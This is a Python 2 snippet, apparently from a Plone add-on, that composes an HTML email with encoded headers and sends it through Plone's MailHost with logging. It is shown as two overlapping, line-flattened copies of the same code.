Create the message ('plain' stands for Content-Type: text/plain) # plone4 should use 'text/plain' according to the docs, but this should work for us # http://plone.org/documentation/manual/upgrade-guide/version/upgrading-plone-3-x-to-4.0/updating-add-on-products-for-plone-4.0/mailhost.securesend-is-now-deprecated-use-send-instead/ msg = MIMEText(message, 'html', body_charset) msg['From'] = email_from msg['To'] = email_to msg['Subject'] = subject msg = msg.as_string() # Finally send it out. mailhost = getToolByName(portal, 'MailHost') try: LOGGER.info("Begin sending email to %r " % formatted_recipients) LOGGER.info("Subject: %s " % subject) mailhost.send(msg) except gaierror, exc: LOGGER.error("Failed sending email to %r" % formatted_recipients) LOGGER.error("Reason: %s: %r" % (exc.__class__.__name__, str(exc)))
formatted = formataddr((recipient_name, recipient_addr)) formatted_recipients.append(formatted) email_to = ', '.join(formatted_recipients) # Make the subject a nice header subject = Header(safe_unicode(subject), header_charset) # Create the message ('plain' stands for Content-Type: text/plain) # plone4 should use 'text/plain' according to the docs, but this should work for us # http://plone.org/documentation/manual/upgrade-guide/version/upgrading-plone-3-x-to-4.0/updating-add-on-products-for-plone-4.0/mailhost.securesend-is-now-deprecated-use-send-instead/ msg = MIMEText(message, 'html', body_charset) msg['From'] = email_from msg['To'] = email_to msg['Subject'] = subject msg = msg.as_string() # Finally send it out. mailhost = getToolByName(portal, 'MailHost') try: LOGGER.info("Begin sending email to %r " % formatted_recipients) LOGGER.info("Subject: %s " % subject) mailhost.send(msg) except gaierror, exc: LOGGER.error("Failed sending email to %r" % formatted_recipients) LOGGER.error("Reason: %s: %r" % (exc.__class__.__name__, str(exc))) else: LOGGER.info("Succesfully sent email to %r" % formatted_recipients) # vim: set ft=python ts=4 sw=4 expandtab :